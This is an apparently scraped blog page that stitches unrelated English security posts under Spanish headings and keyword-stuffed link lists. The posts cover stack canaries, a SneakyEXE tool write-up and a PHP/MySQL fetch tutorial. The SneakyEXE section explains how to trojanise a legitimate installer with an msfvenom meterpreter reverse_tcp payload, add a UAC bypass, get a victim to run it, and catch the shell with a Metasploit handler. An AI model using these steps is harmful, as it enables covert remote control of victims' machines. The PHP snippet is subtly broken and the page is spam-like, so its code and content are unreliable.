BUEN FIN DE CUATRIMESTRE...!! A DISFRUTAR DE ESTAS MERECIDAS VACACIONES.. NOS VEMOS EL PRÓXIMO :)

sábado, 9 de mayo de 2020

ADVANTAGE OF ETHICAL HACKING

Advantage of Ethical Hacking

Hacking is quite useful in the following purpose-

1-To recover lost information, especially in case you lost your password.

2-To perform penetration testing to strengthen computer and network security.

3-To put adequate preventative measure in place to prevent security breaches.

4-To have a computer system that prevents malicious hackers from gaining access.

5-Fighting against terrorism and national security breaches.


More info

  1. Bluetooth Hacking
  2. Hacker Profesional
  3. Paginas De Hacking
  4. Hacking Software
  5. Growth Hacking Examples
  6. Hacking Web
  7. Hacking Usb
  8. Hacking Games Online
  9. Hacking Wifi Windows
  10. Libro Hacking Etico
  11. Viral Hacking
  12. Growth Hacking Marketing
  13. Tipos De Hacker
  14. Funnel Hacking Live
  15. Hacking Usb

Linux Stack Protection By Default

Modern gcc compiler (v9.2.0) protects the stack by default and you will notice it because instead of SIGSEGV on stack overflow you will get a SIGABRT, but it also generates coredumps.




In this case the compiler adds the variable local_10. This variable helds a canary value that is checked at the end of the function.
The memset overflows the four bytes stack variable and modifies the canary value.



The 64bits canary 0x5429851ebaf95800 can't be predicted, but in specific situations is not re-generated and can be bruteforced or in other situations can be leaked from memory for example using a format string vulnerability or an arbitrary read wihout overflowing the stack.

If the canary doesn't match, the libc function __stack_chck_fail is called and terminates the prorgam with a SIGABORT which generates a coredump, in the case of archlinux managed by systemd and are stored on "/var/lib/systemd/coredump/"


❯❯❯ ./test 
*** stack smashing detected ***: terminated
fish: './test' terminated by signal SIGABRT (Abort)

❯❯❯ sudo lz4 -d core.test.1000.c611b7caa58a4fa3bcf403e6eac95bb0.1121.1574354610000000.lz4
[sudo] password for xxxx: 
Decoding file core.test.1000.c611b7caa58a4fa3bcf403e6eac95bb0.1121.1574354610000000 
core.test.1000.c611b : decoded 249856 bytes 

 ❯❯❯ sudo gdb /home/xxxx/test core.test.1000.c611b7caa58a4fa3bcf403e6eac95bb0.1121.1574354610000000 -q 


We specify the binary and the core file as a gdb parameters. We can see only one LWP (light weight process) or linux thread, so in this case is quicker to check. First of all lets see the back trace, because in this case the execution don't terminate in the segfaulted return.




We can see on frame 5 the address were it would had returned to main if it wouldn't aborted.



Happy Idea: we can use this stack canary aborts to detect stack overflows. In Debian with prevous versions it will be exploitable depending on the compilation flags used.
And note that the canary is located as the last variable in the stack so the previous variables can be overwritten without problems.




More info


  1. Hacker Etico
  2. Hacking System
  3. Curso Hacker
  4. Curso De Hacking
  5. Growth Hacking
  6. Como Hackear
  7. Curso Completo De Hacking Ético
  8. Como Hacer Hacker
  9. Libro Hacking Etico
  10. Aprender Seguridad Informatica

SigPloit SS7 Tool

More information

viernes, 8 de mayo de 2020

PentestBox - Opensource PreConfigured Portable Penetration Testing Environment For The Windows

Read more


  1. Hacking In Spanish
  2. Amiibo Hacking
  3. Hacking Web Sql Injection Pdf
  4. Hacking Linux
  5. House Hacking
  6. Hacking Etico Que Es
  7. Reddit Hacking
  8. Hacking Aves
  9. Hacking Gif
  10. Raspberry Hacking
  11. Tools For Hacking Wifi
  12. Arduino Hacking

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


Related posts


  1. Que Es Hacking Etico
  2. Hacking Ético Con Herramientas Python Pdf
  3. Hacking Web Sql Injection
  4. Hacking Websites
  5. Hacking To The Gate
  6. Que Estudiar Para Ser Hacker
  7. Google Hacking

How To Fetch Data From The Database | Tutorial 4


Welcome to my another PHP and MYSQL tutorial. In the previous I've discussed about the data insertion into database by using PHP and MYSQL. So i did successfully in the previous video.

In this video tutorial I'll discuss How to fetch data from the database called as data fetching. It's really a simple thing to access your data which is in database. You just have to do a little work for this. For fetching data you have follow some steps.

How to Fetch Data from Database

Step 1:

Make a connection with your database which i did in the previous blog.

Step 2:

If you wanna fetching a values in "form" or in a table so just have to create a form, table or whatever you want in HTML. I've created a table where I'll show you how to fetch data in table form.

Step 3:

Write a query SELECT * FROM table_Name;

Step 4:

Create a Loop for fetching all the data on a single click. 

Step 5:

Create variables for the sake of storing a different values from the combined values in the loop variable like:

//while loop to fetch all the values from the database and stored in the variable named "row".
while($row = mysql_fetch_array(mysql_query($conn,$query))){

$name = $row['username']; //$name will save all the username values from the loop variable 'row'.
$pass = $row['password']; //$pass will save the password values from the loop variable 'row'.

}

Now watch the video for better understanding.

Tu opinión es importante....

Seguidores

recetas de cocina